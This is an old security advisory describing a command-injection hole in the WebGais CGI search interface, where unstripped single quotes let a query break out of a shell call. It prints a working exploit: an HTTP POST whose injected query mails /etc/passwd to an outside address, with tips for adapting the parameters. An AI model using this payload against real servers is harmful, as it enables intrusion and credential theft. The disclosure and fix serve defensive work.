COMMAND

    webgais

SYSTEMS AFFECTED

    Systems running this tool

PROBLEM

    WebGais is an interface to the GAIS search tool. It installs a few
    programs in  /cgi-bin. The  main utility  is called  "webgais" and
    does the actual interfacing with the search tool.

    It  reads  the  query  from  a  user  form, and then runs the GAIS
    search engine  for that  query. The  author tried  to protect  the
    program by using single quotes around the query when he passed  it
    to a "system" command. But he forgot one VERY important thing:  to
    strip single  quotes from  the query  (this was  done in Glimpse).
    So, if we send a query like:

        query=';mail+foo@somewhere.net</etc/passwd;echo'&.....

    we will trick the "protection" system.

    The  only  problem  here  is  that  you  have to provide a certain
    combination of input parameters,  to reach the vulnerable  line in
    the script. Credit goes to Razvan Dragomirescu.  So here's how  he
    exploited this:

        telnet target.machine.com 80
        POST /cgi-bin/webgais HTTP/1.0
        Content-length: 85 (replace this with the actual length of the "exploit" line)

        query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph

    ...  and  it  worked.  But  to  make  it work for your system too,
    you'll have to  add other parameters,  like idx_dir and  data_type
    who are required by the script in its original version. Just  make
    a  normal  query  to  your  WebGais  server  and  see what all the
    parameters  are.  But  remember  to  use  "output" and "domain" as
    specified in  this exploit.   Otherwise you  will end  up in  some
    other place of the script and nothing will happen.

SOLUTION

    Strip single quotes from the query (this was  done in Glimpse).